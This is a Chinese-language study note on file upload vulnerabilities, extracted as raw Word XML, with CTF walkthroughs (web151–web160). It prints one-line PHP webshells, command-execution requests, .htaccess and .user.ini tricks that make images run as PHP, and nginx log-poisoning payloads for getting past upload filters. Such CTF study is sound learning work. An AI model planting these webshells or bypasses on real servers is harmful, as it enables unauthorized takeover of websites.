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一、文件上传漏洞的原理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文件上传漏洞是指用户上传了一个可执行的脚本文件，而且通过这个脚本文件获得了执行服务端命令的能力。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危害：可以成为后门文件webshell，直接获得网站权限。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一句话木马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 @eval($_POST['wuya']);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在php.net网站上查找相关的命令内容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eval（）函数表示括号内的语句字符串什么的全都当做代码php执行。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$_POST['wuya']表示从页面中获得wuya这个参数值。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#如果system中有空格需要用双引号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wuya=system("tree c:\\");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#等价于</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://localhost/upload/uploads/shell.php?wuya=system(ipconfig)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#可以进行蚁剑连接，密码是wuya</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 二、文件上传常见验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、后缀名:黑名单,白名单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等价扩展名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2、文件类型:MIME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web151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说明可以修改前端代码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1、发现上传按钮只能上传png格式文件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2、更改前端代码，使其支持php格式，上传一句话木马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3、蚁剑连接，得到flag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web152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1、按照前一题的解法发现并不可行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2、利用burp进行查看，发现此时的content-type并不是图片格式，对此进行修改，image/png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3、改完后同上题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web153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1、按照前两题的方法，直接上传php文件显示文件类型不合规；修改content-type上传不成功；上传php3后缀服务器不能解析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2、看一下upload文件下有index.php，说明可以通过.user.ini文件来上传。因为.user.ini只对他同一目录下的php文件起作用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【.htaccess和.user.ini配置文件妙用】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具体参考.htaccess 和.user.ini 配置文件妙用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.htaccess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#将jpg文件当做php文件解析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>// .htaccess</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AddType application/x-httpd-php .jpg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1.jpg</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;?php phpinfo();?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.user.ini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auto_prepend_file=&lt;filename&gt;         //包含在文件头</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>auto_append_file=&lt;filename&gt;          //包含在文件尾</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#在当前目录下的.php文件包含1.jpg这个图片,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在此处相当于在11.php文件头插入了require('1.jpg')这条语句</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>// .user.ini</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>auto_prepend_file = 1.jpg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1.jpg</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;?php phpinfo();?&gt;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11.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、因为要上传文件，所以前端要改一下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4、上传1.png的一句话木马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5、在burp中改两个地方，最后user.ini成功上传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6、蚁剑连接，找到flag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web154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1、几经尝试，发现php不能通过，phP可以通过，说明过滤掉了php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2、用php短标签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&lt;?=@eval($_POST['s']);?&gt;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web155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同上题方法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web156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1、如果上传说类型不合规，可以在repeater中把文件中的内容进行删除，看那一块不合规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2、发现是方括号的原因，用花括号代替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其他同上题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web157~web159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过滤了php，system，{}，和分号，直接执行命令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&lt;?=`tac ../fl*`?&gt;  //等价于&lt;?= system('cat ../fl*')?&gt;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//(tac：cat反序，反引号英文大写``)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web160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此题在上面的基础上过滤了反引号，还可以用日志包含。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/var/log/nginx/ 目录是 NGINX 的默认日志位置，可以从中找到一个 access.log 文件和 error.log 文件，include函数包含日志查看日志内容。考虑到过滤log，利用了php的字符串连接性。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&lt;?=include"/var/l"."og/nginx/access.lo"."g"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1、上传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2、上传user.ini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3、发现日志中的内容是user-agent的内容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4、将一句话木马写到user-agent中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iOTY3NjUwYzcyZGM1ODNlZGIwNDEzODkyMThmOWYifQ=="/>
    <w:docVar w:name="KSO_WPS_MARK_KEY" w:val="d2f25439-09ef-42af-b233-794542b91d90"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="41C537DA"/>
    <w:rsid w:val="6F55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870</Words>
  <Characters>1621</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>7</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1692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2024-04-26T12:20:31Z</dcterms:created>
  <dc:creator>23172</dc:creator>
  <cp:lastModifiedBy>huarui</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-26T12:28:11Z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9E72336A00CB448BB3D6847B595C1339</vt:lpwstr>
  </property>
</Properties>
</file>